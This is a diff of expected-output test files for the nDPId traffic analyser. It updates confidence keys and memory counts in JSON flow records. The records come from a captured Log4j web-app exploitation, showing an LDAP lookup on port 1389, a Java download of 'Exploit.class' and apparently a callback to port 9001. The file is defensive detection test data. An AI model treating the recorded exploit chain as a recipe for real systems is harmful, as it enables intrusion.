00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="} 
@@ -33,24 +33,24 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639425834628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hjinD15132liFoBJxIDRmAAACBAW0BAIICinhDWbyKVxpAQMDBw=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1639425834628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADRNd0AAQAa5FawQ7gqsEO4L4Y4FbXfaWIUpw9eegBAA5TReAAABAQgK8ilcainhDWY="} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834639,"flow_last_seen":1639425834639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834639,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639425834639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzOBEAAQAY4gKwQ7gqsEO4LvZYAUJNLn5gAAAAAoAJyEDRmAAACBAW0BAIICvIpXHQAAAAAAQMDBw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639425834639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9lr\/2uzmTS5+ZoBJxIDRmAAACBAW0BAIICinhDXHyKVx0AQMDBw=="} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1639425834639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADTOBUAAQAY4h6wQ7gqsEO4LvZYAUJNLn5m\/9rs6gBAA5TReAAABAQgK8ilcdSnhDXE="} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} -01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} +01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834645,"flow_last_seen":1639425834645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834645,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639425834645,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834645,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNUUAAQAY\/J6wQ7goKCgof2MojKQYXlfcAAAAAoAJyEK5yAAACBAW0BAIICq5YS5wAAAAAAQMDBw=="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639425834646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1639425834646,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAACgAAEAAQAaMjAoKCh+sEO4KIynYygAAAAAGF5X4UBQAAGmJAAA="} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00934{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00934{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":354,"flow_first_seen":1639425815944,"flow_last_seen":1639425833586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":861,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 
-00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 
+00934{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","packets-captured":426,"packets-processed":422,"total-skipped-flows":0,"total-l4-payload-len":5830,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1639425834697} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 426/422 @@ -60,9 +60,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5894613 bytes -~~ total memory freed........: 5894613 bytes -~~ total allocations/frees...: 118582/118582 +~~ total memory allocated....: 6028247 bytes +~~ total memory freed........: 6028247 bytes +~~ total allocations/frees...: 121344/121344 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 201 chars ~~ json string max len.......: 1057 chars diff --git a/test/results/long_tls_certificate.pcap.out b/test/results/long_tls_certificate.pcap.out index c88e2843c..650628960 100644 --- a/test/results/long_tls_certificate.pcap.out +++ b/test/results/long_tls_certificate.pcap.out 
@@ -4,10 +4,10 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609756181300,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqknAqAE8ag9ke9glAbsIXeEZAAAAALAC\/\/9qjwAAAgQFtAEDAwUBAQgKDpRqEwAAAAAEAgAA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609756181671,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181671,"pkt":"KDc3AG3IEBMx8Tl2CABFAABAAABAACsGv0lqD2R7wKgBPAG72CWlbC1xCF3hGrASMqDiugAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609756181671,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609756181671,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGqmHAqAE8ag9ke9glAbsIXeEapWwtclAQ\/\/+JLgAA"} 
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
